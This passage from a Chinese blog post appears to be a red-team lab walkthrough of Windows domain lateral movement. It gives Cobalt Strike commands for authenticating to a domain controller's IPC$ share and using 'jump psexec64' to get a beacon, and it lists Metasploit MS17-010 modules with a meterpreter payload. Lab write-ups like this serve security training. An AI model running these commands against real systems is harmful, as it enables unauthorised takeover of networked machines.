<li>远程创建用于运行<code>PSEXESVC.exe</code>的服务</li>
<li>远程启动服务</li>
</ol>
<p><code>PSEXESVC</code>服务充当一个重定向器。它在远程系统上运行指定的可执行文件。同时它通过主机之间来重定向进程的输入/输出。</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007113116795.png" style="zoom:67%;" />



</li>
</ol>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p><code>SMB</code>这个协议起初只是用来进行文件共享的，它应该还没有包含telnet的功能。</p>
<p><code>PsExec</code> 可以算是一个轻量级的 telnet 替代工具，它使您无需手动安装客户端软件即可执行其他系统上的进程，并且可以获得与命令控制台几乎相同的实时交互性。</p>
<p>可以说，<code>PsExec + SMB</code>相当于是一个新的telnet服务了。当获取到域成员的明文密码时就可以横向到其它主机上。</p>
<h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h4><ol>
<li><p>CS中命令行形式</p>
<p>通过SMB连接到域控：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">shell net use \\<span class="number">192.168</span>.<span class="number">52.141</span>\ipc<span class="variable">$</span> /user:<span class="string">&quot;administrator&quot;</span> <span class="string">&quot;xxxxx&quot;</span></span><br><span class="line"><span class="comment"># 检验是否连接成功</span></span><br><span class="line">shell <span class="built_in">ls</span> \\<span class="number">192.168</span>.<span class="number">52.141</span>\c<span class="variable">$</span></span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007114425656.png" style="zoom:67%;" />

<p>创建一个smb监听：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007114931555.png" alt="smb" style="zoom:67%;" />

<p>使用<code>psexec</code>获取到目标主机的beacon：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; jump psexec64 <span class="number">192.168</span>.<span class="number">52.141</span> test_smb</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007115133669.png" alt="image-20201007115133669"></p>
</li>
<li><p>cs中的图形化</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007115824262.png"></p>
<p>then上线成功：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007115901369.png" alt="image-20201007115901369"></p>
</li>
</ol>
<h3 id="2-ms17-010"><a href="#2-ms17-010" class="headerlink" title="2. ms17-010"></a>2. ms17-010</h3><p>发现事先用了横向移动的方法一后MSF中的很多模块就打不了惹，或者是其它问题。</p>
<p>这里就记两个模块然后吃饭去咯：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 方法一</span></span><br><span class="line">use exploit/windows/smb/ms17010psexec</span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line"><span class="meta">#</span><span class="bash"> 方法二</span></span><br><span class="line">use auxiliary/admin/smb/ms17010command</span><br><span class="line"><span class="meta">#</span><span class="bash"> 方法二是执行命令并不是弹shell，还需要设置<span class="built_in">command</span>的参数</span></span><br></pre></td></tr></table></figure>



<h3 id="3-pth"><a href="#3-pth" class="headerlink" title="3. pth"></a>3. pth</h3><p>也许会更吧？但不是今天咯。</p>

    </div>
  </article>
  <div class="toc-container">
    
  <div id="toc" class="toc-article">
    <strong class="toc-title">Posts</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E4%B8%80"><span class="toc-text">红队评估一</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-CS%E5%92%8CMSF%E4%B8%8A%E7%BA%BF"><span class="toc-text">一 CS和MSF上线</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-CS%E4%B8%8A%E7%BA%BF"><span class="toc-text">1. CS上线</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-MSF%E4%B8%8A%E7%BA%BF"><span class="toc-text">2. MSF上线</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-CS%E6%B4%BE%E7%94%9FMSF"><span class="toc-text">3. CS派生MSF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-MSF%E6%B4%BE%E7%94%9FCS"><span class="toc-text">4. MSF派生CS</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">二 信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%9C%AC%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">1.本机信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%9F%A5%E8%AF%A2%E5%BD%93%E5%89%8D%E6%9D%83%E9%99%90"><span class="toc-text">2.查询当前权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%9C%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E5%9F%9F"><span class="toc-text">3.看是否存在域</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%8E%A2%E6%B5%8B%E5%9F%9F%E5%86%85%E4%B8%BB%E6%9C%BA"><span class="toc-text">4.探测域内主机</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#NetBIOS"><span class="toc-text">NetBIOS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ICMP"><span class="toc-text">ICMP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ARP"><span class="toc-text">ARP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#TCP-UDP"><span class="toc-text">TCP&#x2F;UDP</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E6%89%AB%E6%8F%8F%E5%9F%9F%E5%86%85%E7%AB%AF%E5%8F%A3"><span class="toc-text">5.扫描域内端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E5%9F%9F%E5%86%85%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">6.域内信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E5%AE%9A%E4%BD%8D%E5%9F%9F%E7%AE%A1%E7%90%86%E5%91%98"><span class="toc-text">7.定位域管理员</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-%E6%9F%A5%E6%89%BE%E5%9F%9F%E7%AE%A1%E8%BF%9B%E7%A8%8B"><span class="toc-text">8.查找域管进程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%92%E6%9B%B2-%E6%9D%82%E7%A7%8D%E6%93%8D%E4%BD%9C"><span class="toc-text">插曲 [杂种操作]</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#kill-explorer-exe"><span class="toc-text">kill explorer.exe</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E9%98%B2%E7%81%AB%E5%A2%99"><span class="toc-text">关于防火墙</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-text">三 权限提升</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-text">四 横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-IPC-SMB-PsExec"><span class="toc-text">1.IPC+SMB+PsExec</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A6%82%E5%BF%B5%E4%BB%8B%E7%BB%8D"><span class="toc-text">概念介绍</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-text">使用</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-ms17-010"><span class="toc-text">2. ms17-010</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-pth"><span class="toc-text">3. pth</span></a></li></ol></li></ol></li></ol>
  </div>


  </div>
</div>
<div class="copyright">
</div>
<div class="share" style="width: 100%;">
</div>

  
    <div class="post-nav">
      <div class="post-nav-item post-nav-next">
        
      </div>
  
      <div class="post-nav-item post-nav-prev">
          
          <a href="/2020/11/05/yso-CommonsCollections/" rel="prev" title="yso-CommonsCollections">
            yso-CommonsCollections
          </a>
          <span>〉</span>
        
      </div>
    </div>
  


    </div>

    

  </div>
  <footer class="footer text-center">
    <div id="bottom-inner">
        <a class="bottom-item" href="">首页</a> |
        <a class="bottom-item" href="" target="_blank">主站</a> |
        <a class="bottom-item" href="https://github.com/KevinOfNeu" target="_blank">GitHub</a> |
        <a class="bottom-item" href="https://hexo.io" target="_blank">Powered by hexo</a> |
        <a class="bottom-item" href="https://github.com/KevinOfNeu/hexo-theme-xoxo" target="_blank">Theme xoxo</a>
    </div>
</footer>
  

<script>
  (function(window, document, undefined) {

    var timer = null;

    function returnTop() {
      cancelAnimationFrame(timer);
      timer = requestAnimationFrame(function fn() {
        var oTop = document.body.scrollTop || document.documentElement.scrollTop;
        if (oTop > 0) {
          document.body.scrollTop = document.documentElement.scrollTop = oTop - 50;
          timer = requestAnimationFrame(fn);
        } else {
          cancelAnimationFrame(timer);
        }
      });
    }

    var hearts = [];
    window.requestAnimationFrame = (function() {
      return window.requestAnimationFrame ||
        window.webkitRequestAnimationFrame ||
        window.mozRequestAnimationFrame ||
        window.oRequestAnimationFrame ||
        window.msRequestAnimationFrame ||
        function(callback) {
          setTimeout(callback, 1000 / 60);
        }
    })();
    init();

    function init() {
      css(".heart{z-index:9999;width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: absolute;}.heart:after{top: -5px;}.heart:before{left: -5px;}");
      attachEvent();
      gameloop();
      addMenuEvent();
    }

    function gameloop() {
      for (var i = 0; i < hearts.length; i++) {
        if (hearts[i].alpha <= 0) {
          document.body.removeChild(hearts[i].el);
          hearts.splice(i, 1);
          continue;
        }
        hearts[i].y--;
        hearts[i].scale += 0.004;
        hearts[i].alpha -= 0.013;
        hearts[i].el.style.cssText = "left:" + hearts[i].x + "px;top:" + hearts[i].y + "px;opacity:" + hearts[i].alpha + ";transform:scale(" + hearts[i].scale + "," + hearts[i].scale + ") rotate(45deg);background:" + hearts[i].color;
      }
      requestAnimationFrame(gameloop);
    }

    /**
     * 给logo设置点击事件
     * 
     * - 回到顶部
     * - 出现爱心
     */
    function attachEvent() {
      var old = typeof window.onclick === "function" && window.onclick;
      var logo = document.getElementById("logo");
      if (logo) {
        logo.onclick = function(event) {
          returnTop();
          old && old();
          createHeart(event);
        }
      }
      
    }

    function createHeart(event) {
      var d = document.createElement("div");
      d.className = "heart";
      hearts.push({
        el: d,
        x: event.clientX - 5,
        y: event.clientY - 5,
        scale: 1,
        alpha: 1,
        color: randomColor()
      });
      document.body.appendChild(d);
    }

    function css(css) {
      var style = document.createElement("style");
      style.type = "text/css";
      try {
        style.appendChild(document.createTextNode(css));
      } catch (ex) {
        style.styleSheet.cssText = css;
      }
      document.getElementsByTagName('head')[0].appendChild(style);
    }

    function randomColor() {
      // return "rgb(" + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + ")";
      return "#F44336";
    }

    function addMenuEvent() {
      var menu = document.getElementById('menu-main-post');
      if (menu) {
        var toc = document.getElementById('toc');
        if (toc) {
          menu.onclick = function() {
            if (toc) {
              if (toc.style.display == 'block') {
                toc.style.display = 'none';
              } else {
                toc.style.display = 'block';
              }
            }
          };
        } else {
          menu.style.display = 'none';
        }
      }
    }

  })(window, document);
</script>

  



</body>
</html>
